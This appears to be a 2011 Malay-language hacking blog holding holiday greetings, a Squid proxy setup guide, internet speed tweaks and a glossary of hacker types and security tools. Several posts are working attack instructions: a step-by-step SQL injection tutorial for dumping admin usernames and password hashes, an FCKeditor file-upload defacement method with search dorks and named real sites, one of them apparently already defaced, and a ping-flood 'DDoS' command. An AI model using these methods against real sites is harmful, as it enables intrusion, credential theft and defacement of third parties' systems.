Pages

Monday 29 August 2011

Selamat Hari Raya Aidilfitri



Selamat Hari Raya Maaf Zahir Batin kepada seluruh umat islam .

Bagi yang nak PMR tu taya lah nak raya2 sangat . Soalan PMR tade tanya pun berapa hari anda beraya tahun ini . Ekekeke . So study lagi baik .

And bagi yang nak trial SPM pun sama . Jangan kerja nak kumpul duit raya je . Beringat sikit . SPM ni penentu masa depan . (Admin pun belum study sebenarnye , Ekekeke )

Da tu je nak cakap sebenarnye . HAHAHA . Oke Bye2 . Assalamualaikum ~

Admin ada siapkan 1 deface raya untuk korang .

http://www.inputandanalysis.com/raya.html

Saturday 27 August 2011

SQL Injection Manual

SQL Injection ( SQLi Tutorial )

5 perkara yang anda perlu tahu tentang SQLi

- Asas injection
- Mendapatkan Data
- Keluarkan Data
- Kumpul Maklumat
- Kumpul Data

Asas Injection
- Seperti yang semua tahu , jika ingin melakukan SQL injection , semestinya laman tersebut menggunakan Database. Ini kerana melalui injection sql ini adalah untuk mendapatkan maklumat melalui database tersebut.
- Cara mudah mengesan laman yang menggunakan sql ialah jika diperhatikan pada URL ( alamat web ) , ianya mempunyai perimeter id= seperti :
http://www.contoh.my/index.php?id=1
- "index.php" merupakan nama file dan "id=1" merupakan perimeter bagi sesuatu info pada laman tersebut.
- Dengan menggunakan perintah :
$result = $db -> query ("SELECT * FROM `content` WHERE id=" . $_GET ['id']);
- Kebiasaanya laman akan diperintahkan melalui :
SELECT * FROM `content` WHERE id=1
- Ini akan membolehkannya disuntik ( inject ) pada perimeter id=1 . Contohnya :
http://www.contoh.my/index.php?id=1'
- Maka anda akan perhatikan keluar error seperti :
Fatal error: Call to a member function fetch_row() on a non-object in /home/sites/contoh.my/public_html/index.php on line 50
- Namunpun begitu , bukan semua laman akan mengeluarkan error jenis ini, jika anda perhatikan perbezaan laman sebelum dan selepas di inject , maka ia berpotensi di inject.
- Jadi , sehingga kini KH harap anda semua faham bagaimana untuk mengenalpasti laman yang berpotensi di inject .



Mendapatkan Data
- Dibahagian ini , KH akan menerangkan secara lalu bagaimana mendapatkan Data melalui query ( suntikan / injection )
- Setelah kita mendapati sesuatu laman mempunyai vuln untuk sql injection , anda perlu mendapatkan maklumat jumlah table dan column dalam bagi sesuatu database.
- Dengan menggunakan arahan ORDER BY akan memberikan maklumat tersebut.
- Anda harus meneka jumlah table dengan perhatikan error yang muncul. Jika belum keluar error maka jumlah table masih banyak.
- Contohnya :
http://www.contoh.my/index.php?id=1+ORDER+BY+1--
http://www.contoh.my/index.php?id=1+ORDER+BY+2--
http://www.contoh.my/index.php?id=1+ORDER+BY+3--
http://www.contoh.my/index.php?id=1+ORDER+BY+4-- <--Ada error
- Jadi , jumlah table ialah 3


Keluarkan Data
- Setelah kita mengetahui jumlah table , maka kita perlu mengeluarkan data melalui arahan UNION SELECT
- Contoh laman tadi mempunyai 3 table.
http://www.contoh.my/index.php?id=1+ORDER+BY+3--
- Maka , tambahhkan arahan UNION SELECT. Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,2,3--
- Selepas menjalankan arahan diatas , akan muncul no 1 atau 2 dll bagi menunjukkan no ajaib yang membolehkan arahan dijalankan keatas no tu pula .
- Contohnya untuk laman ini keluar no 2


Kumpul Maklumat
- Setelah kita mendapat no ajaib iaitu 2 , disini kita akan dapatkan maklumat versi / database yang digunakan laman ini.
- Jadi , anda hanya perlu tambah arahan version() pada no ajaib , maka akan keluar versi / database yang digunakan. Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,version(),3--
- Maka versi database akan muncul seperti 4.X.X atau 5.X.X , jika database laman tersebut menggunakan versi 5 , maka anda boleh guna default database name nya iaitu information_schema .
- Jadi , database name kita dah dapat , seterusnya kita dapatkan table name pula melalui arahan TABLE_NAME. Arahan ini diletakkan di no ajaib tadi ( 2 )
- Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,TABLE_NAME,3--
- Dan tambahkan database name kat belakang menjadi :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,TABLE_NAME,3+from+information_schema.tables--
- Maka anda akan dapat lihat table yang ada dalam database laman tersebut.


Kumpul Data
- Jadi sekarang anda sudah dapat lihat table yang ada dalam laman tersebut , langkah terakhir ini ialah untuk mengumpul Data daripada table.
- Jadi , perkara asas yang biasanya penggodam lakukan ialah mencari table yang mengandungi maklumat Admin / users bagi membolehkannya mendapatkan maklumat login ( email , password )
- Gunakan arahan group_concat(table_name) pada no ajaib ( 2 ) bagi mengeluarkan maklumat dalam table tersebut.
- Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables--
- Dan gantikan +from+information_schema.tables+where+table_schema=database()-- kat belakang. Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--
- Kali ini anda akan perhatikan folder table yang mengandungi data didalamnya. Contohnya anda lihat table yang bernama " Admin " , sila convert table name " Admin " tersebut kepada HEXADECIMEL disini
- Setelah anda convert , sila masukkan arahan group_concat(column_name) kat no ajaib tadi ( 2 ). Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.tables+where+table_schema=database()--
- Dan kemudian tambahkan arahan +from+information_schema.columns+where+table_name=0xHEXADECIMEL-- . Contohnya table name tadi " Admin " , setelah di convert menjadi 41444D494E . Maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E--
- Sekarang kita berada dalam folder ADMIN , jadi kita akan keluarkan data melalui arahan concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") . Contohnya table yang ada ialah "username" dan "password" , maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+information_schema.columns+where+table_name=0x41444D494E--
- Kemudian gantikan arahan belakang kepada +from+Admin-- bagi menjayakan arahan untuk mendapatkan maklumat daripada table ADMIN. Maka arahan akan seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+Admin--
- Dan sekarang anda akan lihat data "username" dan "password" seperti arahan yang kita jalankan.
- Password berkemungkinan besar dalam bentuk hash , jadi anda perlu decrypt untuk mendapatkan plain text nya seterusnya mendapatkan login page admin tersebut.

Apa yang KH tunjukkan disini ialah melalui 5 langkah sahaja penggodam berjaya mendapatkan maklumat melalui error sql. Namunpun begitu , masih terdapat beberapa arahan lain yang boleh digunakan pada masa tertentu dan tujuan tertentu.

KH cuba memaparkan cara penggodam mendapatkan data melalui teknik SQLi , jadi ini akan membuka mata semua pihak bagaimana mereka melakukan kerja mereka. Harap dengan info ini maka pihak tertentu akan cuba manfaatkannya kearah kebaikan dan diselangi dengan tujuan pembelajaran.

Info :
1 - Anda boleh gunakan pada file jenis .php dan juga .asp juga
2 - Gunakan dork google untuk memudahkan pencarian perimeter

Friday 26 August 2011

Cara deface menggunakan exploit

Dork :
:Powered bu Opencart site:.com
:SUPORT BY OPENCART



Exploit :
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


Fckeditor Web :
http://www.schoolshopper.com.au/
http://www.inputandanalysis.com/

Step by step :
Bukak Fckeditor web tu .
Lepas tu tambah exploit kat belakang fckeditor web tu .
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Then korang ade nampak connector kat atas belah kirikan dan connector tu tulis ASP .
Tukar ASP tu kepada PHP.


Then choose file code html korang.


Upload file tu .

Kalau nak tahu sama ada file korang tu da upload ke belum . Nanti dia kuar macam ni .


Last sekali type balik fckeditor web tu . Tapi tambah /namafilecodehtmlkorang.html

Contoh : http://www.schoolshopper.com.au/silly13a13y.html



Try and Error oke .

DDoS menggunakan CMD .

Caranya amat mudah sekali .

1. Click start dan type cmd (windows 7) . Kalau windows xp korang click kat run then type cmd .

2. Type ni . Ping (ip address website tersebut) -t -l 64000(packet size yang korang nak guna) .

Siap ~ Hehe

Cara melajukan internet yang menggunakan modem .

Sini ada teknik nak speed up internet
Teknik 1
Pergi kat computer. Right klik pilih properties . Pilih device manager . Lepas tu pilih port . pilih Communication Port . Double click untuk buka.
Pergi ke Communication Port properties . Pergi ke port setting . Pilih 128000 lepas tu kat flow control tukar hardware .

Teknik 2
Copy coding ni

REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c

Save kepada speed.reg . Lepastu double click . Install regedit ni .

Teknik 3
Pergi kat run taip "gpedit.msc"

Goto:>Local Computer Policy
-------–>Computer Configuration
-------–>Administrative Templates
-------–>Network–>QOS Packet Scheduler
-------–>Limit Reservable Bandwidth

Double klik kat Limit Reservable bandwidth

Enablekan ia . tukar 20% ke 0% . lepas enabled boleh nampak .

Done . Selamat Mencuba xDD

Wednesday 6 July 2011

Proxy Server

Proxy server adalah program yang menerima permintaan (request)dari klien, seperti browser web atau ftp klien,dan kemudian meneruskan permintaan tersebut ke server internet yang dituju. Salah satu program yang cukup powerfull dalam menangani masalah keterbatasan kecepatan akses dan keamanan data yang dipergunakan untuk menangani keperluan internet adalah SQUID. Bagi seseorang administrator jaringan,merupakan tugas utama untuk mengatur lau-lintas data dalam suatu jaringan baik dari dalam maupun keluar jaringan. Squid merupakan pilihan terbaik untuk membangun proxy server karena selain handal juga gratis dan mendukung fitur ICP.
Melalui proxy server,seolah-olah klien merasaberinteraksi secara langsung dengan server internet yang dituju.Kenyataannya,sebelum data atau permintaannya disampaikan ke tujuan, data tersebut diarahkan terlebih dahulu ke server proxy,kemudian server proxy akan meneruskan ke server yang dituju,yaitu internet.
Dibawah ini adalah perbandingan antara klien yang menggunakan proxy dan tidak menggunakan proxy :

1.Tanpa Proxy
Browser web/Klien FTP -->> Server Internet

2.Melalui Proxy
Browser web/Klien FTP -->> Server Proxy->Server Internet

Kelebihan Operating System yang menggunakan proxy adalah data yang diminta dari klien akan diarahkan ke server proxy kemudian dilanjutkan ke server internet.Pada saat data dari server datang,data tersebut akan diarahkan oleh server internet ke server proxy kemudian server proxy meneruskan data tsb ke klien yg memintanya.

Disamping memberikan data ke klien,server proxy juga menyimpan salinan data itu sebagai webcache di hardisk.Apabila ada user lain yg meminta data yg sama,maka server proxy akan mengambil data tersebut dari hardisknya tanpa harus melakukan koneksi ke server internetyg menyediakan data tsb. Kalau permintaan yg sama dilakukan oleh user berkali-kali tentu akan mempengaruhi kecepatan akses internet secara signifikan.

Instalasi Proxy Server
setup proxy:
1.ambil source squid di ftp (gateway) atau download di www.squidcache.org
2.ekstrak source
3.kompilasi dan setup
4.start proxy

1.Download Source di www.squidcache.org
misal disini kita akan menggunakan squid-2.6.stable-13.tar.gz

2.untuk mengekstrak source maka digunakan perintah:
tar -zxvf squid-2.6.stable-13.tar.gz

3.langkah selanjutnya adalah membuat group misal groupnya kita beri nama squid
#groupadd squid

setelah itu kita membuat user dengan nama squid
#useradd -g squid -d /home/squid squid

Buat direktory dengan nama squid yang akan diletakan pada direktory usr/local
#mkdir /usr/local/squid
#mkdir /home/squid
rubah kepemilikan directory:
#chown -r squid:squid /home/squid
#cd squid-2.6.stable13
#./configure --prefix=/usr/local/squid
#make
#make install
#chown -R squid:squid /usr/local/squid
ganti password squid dengan:
#passwd squid

4. LOGIN dengan user squid
#/usr/local/squid/sbin/squid -Z
#/usr/local/squid/sbin/squid -dfy

Wednesday 29 June 2011

Its all about HACKER .

- Penggodam (hacker) boleh membawa maksud seseorang yang mahir dalam bidang komputer; namun media massa selalu menyamakan "penggodam" dengan "penggodam topi hitam".

- Topi hitam (black hat): seseorang yang mensubversi keselamatan komputer tanpa izin atau menggunakan teknologi (biasanya sebuah komputer ataupun internet) untuk tujuan keganasan, vandalisme, penipuan kad kredit, pencurian identiti, pencurian hak milik intelektual, dan sebagainya. Ini juga bermakna mengambil alih kawalan komputer lain melalui sebuah rangkaian, atau perekahan perisian (software cracking).

- Topi kelabu (grey hat): Penggodam yang etikanya tidak jelas atau di batasan undang-undang, seringkali mengaku terang-terang.

- Topi putih (white hat): Penggodam beretika yang memecah keselamatan tetapi untuk tujuan altruistik ataupun sekurang-kurangnya tidak berniat jahat. Topi putih biasanya mempunyai etika yang jelas, dan selalu berusaha untuk bekerja dengan pengilang atau pemilik untuk memperbaiki kelemahan yang dijumpai, walaupun banyak yang mengancam sama ada tersirat atau jelas untuk memaklumkan kepada awam selepas tempoh "sesuai" untuk memastikan respons yang kena pada waktunya. Istilah ini juga digunakan untuk penggodam yang mereka dan mengekod sistem yang lebih selamat.

- Perekah/Penggertak (cracker):
Topi hitam. Sering digunakan untuk membezakan penggodam topi hitam dengan penggodam lain.

Penggodam komputer yang menggunakan perekahan kata laluan atau serangan kuasa keras. Berkait denga istilah pemecah peti besi.

Perekah perisian. Orang yang mengkhusus dalam mengatasi mekanisma perlindungan penyalinan perisian. Tidak mengeksploit rangkaian, cuma perisian.
- Budak skrip (script kiddie): Penceroboh komputer yang tidak begitu mahir; seseorang yang sekadar mengikut arahan ataupun menggunakan teknik buku resepi tanpa memahami langkah yang dibuatnya. Pejoratif.

- Hacktivis merupakan penggodam aktivis yang menggunakan teknologi untuk mengumumkan pesanan politik. Perlu dicatat bahawa vandalisme web bukan semestinya hacktivisme.

Kaedah yang biasa dilakukan oleh Penggodam

Disini terdapat beberapa cara yang berulang kali digunakan oleh penjenayah komputer dan pakar keselamatan:

Eksploitasi keselamatan

Aplikasi yang disediakan untuk mengambil kesempatan terhadap kelemahan yang diketahui

Penghidu paket (Packet sniffer)

Satu aplikasi yang menangkap paket data TCP/IP, yang boleh digunakan untuk mengesan kata laluan dan data lain semasa dalam perjalanan sama ada di dalam komputer atau rangkaian.

Rootkit

Satu kit alat yang menyorokkan fakta bahawa keselamatan komputer telah terjejas. Kit alat ini mungkin termasuk pengganti untuk dedua system supaya mustahil untuk pengguna sah mengesannya dengan melihat pada jadual proses.

Kejuruteraan sosial

Meyakinkan orang lain untuk memberikan apa-apa bentuk maklumat mengenai suatu sistem, kerap kali dengan dakwaan palsu. Contoh ketara ialah menanya seseorang mengenai kata laluan atau akaun mereka dengan menyamar sebagai seseorang. Contoh yang lebih licik ialah menanyai mengenai barangan promosi atau rujukan teknikal mengenai sistem syarikat, mungkin dengan berpura-pura sebagai wartawan.

Kuda trojan ( Trojan Horse )

Program ini direka kononnya untuk membuat suatu perkara, seperti satu perisian sah, tetapi sebenarnya melakukan perkara lain. Tetapi ia tidak semestinya program jahat. Kuda Trojan boleh digunakan untuk membuka pintu belakang dalam sistem komputer supaya pencipta program tersebut boleh kembali dan menceroboh masuk. Virus yang menipu pengguna untuk memuat turun dan menjalankannya juga kadang kala dipanggil kuda Trojan. Nama ini berasal dari Kuda Trojan. Lihat juga Pendail.Virus
Virus

Virus merupakan program yang menyalin dan menyebarkan diri dengan memasukkan salinannya ke dalam kod atau dokumen yang boleh dilaksanakan. Oleh itu, virus komputer berkelakuan serupa dengan virus biologi.
Pengimbas kerentanan (Vulnerability scanner)

Alat yang digunakan untuk memeriksa komputer dalam rangkaian dengan cepat, jika ada kelemahan yang diketahui. Penggodam juga biasanya menggunakan pengimbas port (port scanner). Program ini memeriksa port mana pada suatu komputer yang “terbuka” atau boleh digunakan untuk memasukinya, dan ada kalanya mengesan program yang menggunakan port tersebut, serta versinya. (Nota: Dinding api mempertahankan komputer dari penceroboh dengan mengehadkan capaian masuk dan keluar kepada port/mesin, namun ia masih boleh dipintas.)
Cacing (Worm)

Seperti virus, program cacing boleh menyalin dirinya. Bezanya ialah cacing tidak mencipta berbilang salinan dirinya pada satu sistem: ia membiak melalui rangkaian komputer. Ia boleh dibandingkan dengan bakteria dalam biologi. Ramai orang menggabungkan istilah "virus" dan "worm", dan menggunakan keduanya untuk memperihalkan mana-mana program yang merebak. Ini kerana sesuatu program itu boleh jadi mempunyai ciri-ciri kasar kedua-dua cacing dan virus.
ALAT KESELAMATAN

Dinding api (rangkaian). Dalam pengkomputeran, dinding api merupakan sejenis perkakasan dan/atau perisian dalam persekitaran rangkaian yang berfungsi untuk menghalang komunikasi yang dilarang oleh polisi keselamatan, serupa dengan fungsi dinding api atau pengadang bahang dalam pembinaan bangunan.
Sistem pengesanan pencerobohan (IDS) umumnya mengesan manipulasi yang tidak dikehendaki kepada sistem. Manipulasi tersebut boleh jadi serangan oleh penggodam berniat jahat yang mahir, ataupun cuma budak skrip yang menggunakan program automatik.
Perisian antivirus merupakan program komputer yang cuba mengenal pasti, mencegah dan menghapuskan virus komputer dan perisian jahat (malware) lain.
Penyulitan digunakan untuk melindungi mesej pengguna dari orang lain. Terdapat banyak cara yang boleh digunakan seperti menukar letak aksara, menggantikan aksara, ataupun membuang aksara dari mesej. Cara-cara ini perlu digabungkan untuk menjadikan penyulitan tersebut lebih selamat, iaitu sukar untuk direkah.
Keizinan mengehadkan capaian ke komputer kepada sekumpulan pengguna melalui penggunaan sistem pengesahan. Sistem ini boleh melindungi sama ada keseluruhan komputer – seperti melalui skrin log masuk interaktif – atau perkhidmatan individu, seperti pelayan FTP.
Alat pengimbas kerentanan dan pengimbas port boleh digunakan dengan cepat untuk memeriksa komputer pada rangkaian terhadap kelemahan yang diketahui dan port yang boleh digunakan untuk mencapai komputer tersebut.